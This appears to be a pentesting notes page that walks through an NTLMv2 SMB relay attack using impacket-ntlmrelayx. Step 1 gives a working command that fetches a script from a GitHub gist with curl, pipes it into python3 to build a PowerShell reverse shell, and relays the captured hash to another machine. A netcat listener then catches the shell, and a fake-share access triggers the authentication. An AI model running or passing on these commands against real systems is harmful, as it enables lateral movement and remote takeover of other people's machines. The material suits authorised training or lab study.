Connecting using NTLMv2 hash from one machine to another.

We are assuming that the user of the current machine may have local administrator privileges on another machine. Additionally, we are unable to crack NTLMv2, which could be due to various reasons such as a strong password. Therefore, we can attempt to use the hash on another machine in what is known as a relay attack.

[SMB Server] Steps for Relay attack using impacket-ntlmrelayx

Step 1: Start Relay server

We will be using impacket tool with powershell base64 encoded code to perform the attack.

impacket-ntlmrelayx --no-http-server -smb2support -t $Other_PC_IP -c "$(curl -s https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py | python3 - $IP_KALI 8080)"

Expaination:

$(curl -s | python3 - $IP_KALI 8080) fatches the powershell base64 encoded reverseshell and runs it.

--no-http-server As we are relaying SMB we will disable HTTP using this option.

-smb2support: Enables support for SMBv2, allowing ntlmrelayx to relay to servers that only support SMBv2

Step 2: start netcat listener

We will start netcat to get the shell for the other pc.

sudo rlwrap nc -lnvp 8080

# In case you get disconnected from this. Start it again.

We will use our current shell to trigger the authentication and rely the hash.

# In a shell run this.
dir \\$IP_KALI\fakeShare

After running this you will get shell in netcat listener. Check it !!😎

If you are relaying using webserver then find a way to run command show it step 3. If step 1 and step 2 is same then also you will get the shell.

PreviousCapturing and cracking NTLMv2 hash.NextCracking ZIP File

Last updated 1 year ago

[SMB Server] Steps for Relay attack using impacket-ntlmrelayx

Step 1: Start Relay server

Step 2: start netcat listener

Step 3: Trigging SMB share authentication